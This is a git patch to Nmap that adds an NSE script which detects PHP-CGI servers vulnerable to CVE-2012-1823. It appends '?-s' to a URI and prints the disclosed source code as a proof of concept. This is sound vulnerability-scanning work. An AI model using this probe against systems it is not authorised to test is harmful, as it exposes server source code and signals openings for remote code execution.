From 96c6cd7780c306a38e856633f1dc96b368070c88 Mon Sep 17 00:00:00 2001 From: paulino Date: Tue, 8 May 2012 05:56:04 +0000 Subject: [PATCH] Adds http-vuln-cve2012-1823.nse - This script detects PHP-CGI installations that are vulnerable to CVE-2012-1823. This vulnerability is critical and it allows attackers to retrieve source code and execute code remotely. --- scripts/http-vuln-cve2012-1823.nse | 96 ++++++++++++++++++++++++++++++ scripts/script.db | 1 + 2 files changed, 97 insertions(+) create mode 100644 scripts/http-vuln-cve2012-1823.nse diff --git a/scripts/http-vuln-cve2012-1823.nse b/scripts/http-vuln-cve2012-1823.nse new file mode 100644 index 000000000..0f829dbe4 --- /dev/null +++ b/scripts/http-vuln-cve2012-1823.nse @@ -0,0 +1,96 @@ +description = [[ +Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This vulnerability is critical and it allows attackers to retrieve source code and execute code remotely. + +The script works by appending "?-s" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern "<?" to detect +vulnerable installations. + +TODO: +-Improve detection mechanism ( Execute certain payload and look for it in the response to confirm exploitability) +-Add exploitation script +]] + +--- +-- @usage +-- nmap -sV --script http-vuln-cve2012-1823 +-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php +-- @output +-- PORT STATE SERVICE REASON +-- 80/tcp open http syn-ack +-- | http-vuln-cve2012-1823: +-- | VULNERABLE: +-- | PHP-CGI Remote code execution and source code disclosure +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:2012-1823 +-- | Description: +-- | According to PHP's website, "PHP is a widely-used general-purpose +-- | scripting language that is especially suited for Web development and +-- | can be embedded into HTML." When PHP is used in a CGI-based setup +-- | (such as Apache's mod_cgid), the php-cgi receives a processed query +-- | string parameter as command line arguments which allows command-line +-- | switches, such as -s, -d or -c to be passed to the php-cgi binary, +-- | which can be exploited to disclose source code and obtain arbitrary +-- | code execution. +-- | Disclosure date: 2012-05-3 +-- | Extra information: +-- | Proof of Concept:/index.php?-s +-- | References: +-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ +-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823 +-- |_ http://ompldr.org/vZGxxaQ +-- +-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php +--- + +author = "Paulino Calderon" +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"exploit","vuln","intrusive"} + +require "shortport" +require "http" +require "vulns" + +portrule = shortport.http + +action = function(host, port) + local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/index.php" + + local vuln = { + title = 'PHP-CGI Remote code execution and source code disclosure', + state = vulns.STATE.NOT_VULN, -- default + IDS = {CVE = '2012-1823'}, + description = [[ +According to PHP's website, "PHP is a widely-used general-purpose +scripting language that is especially suited for Web development and +can be embedded into HTML." When PHP is used in a CGI-based setup +(such as Apache's mod_cgid), the php-cgi receives a processed query +string parameter as command line arguments which allows command-line +switches, such as -s, -d or -c to be passed to the php-cgi binary, +which can be exploited to disclose source code and obtain arbitrary +code execution.]], + references = { + 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/', + 'http://ompldr.org/vZGxxaQ', + }, + dates = { + disclosure = {year = '2012', month = '05', day = '3'}, + }, + } + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + + local reg_session = http.get(host, port, uri) + if reg_session and reg_session.status == 200 then + if string.match(reg_session.body, "<?") then + stdnse.print_debug(1, "Pattern exists on file! We can't determine if this page is vulnerable. Try with a different URI.") + return + end + end + + local open_session = http.get(host, port, uri.."?-s") + if open_session and open_session.status == 200 then + if string.match(open_session.body, "<?") then + vuln.state = vulns.STATE.EXPLOIT + vuln.extra_info=string.format("Proof of Concept:%s\n%s", uri.."?-s", open_session.body) + return vuln_report:make_output(vuln) + end + end +end diff --git a/scripts/script.db b/scripts/script.db index d2350da85..92401ea1a 100644 --- a/scripts/script.db +++ b/scripts/script.db @@ -169,6 +169,7 @@ Entry { filename = "http-vuln-cve2009-3960.nse", categories = { "exploit", "intr Entry { filename = "http-vuln-cve2010-2861.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-cve2011-3192.nse", categories = { "safe", "vuln", } } Entry { filename = "http-vuln-cve2011-3368.nse", categories = { "intrusive", "vuln", } } +Entry { filename = "http-vuln-cve2012-1823.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } } Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } } Entry { filename = "http-wordpress-enum.nse", categories = { "auth", "intrusive", "vuln", } }